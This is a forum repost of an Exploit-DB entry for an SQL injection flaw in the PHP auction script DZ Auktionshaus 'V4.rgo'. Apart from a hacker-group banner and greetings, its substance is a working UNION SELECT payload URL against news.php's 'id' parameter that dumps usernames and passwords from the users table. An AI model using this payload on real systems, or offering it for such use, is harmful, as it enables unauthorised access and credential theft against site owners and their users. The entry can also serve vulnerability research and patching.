Exploit DZ Auktionshaus 'V4.rgo' - 'id' news.php?SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
11654
Проверка EDB
  1. Пройдено
Автор
EASY LASTER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2010-03-08
Код:
----------------------------Information------------------------------------------------
+Name : DZ Auktionshaus "V4.rgo" (id) news.php SQL Injection
+Autor : Easy Laster
+Date   : 08.03.2010
+Script  : DZ Auktionshaus "V4.rgo"
+Price : 99,99€
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne.

---------------------------------------------------------------------------------------
                                                                                     
 ___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                              |___|                 |___|            


----------------------------------------------------------------------------------------
+Vulnerability : http://server/auktionshaus/index.php?view=read&id=
+Exploitable   : http://server/auktionshaus/news.php?id=null+union+select+1,2,concat
(name,0x3a,password),4,5+from+users#
-----------------------------------------------------------------------------------------
 
Источник
www.exploit-db.com

Похожие темы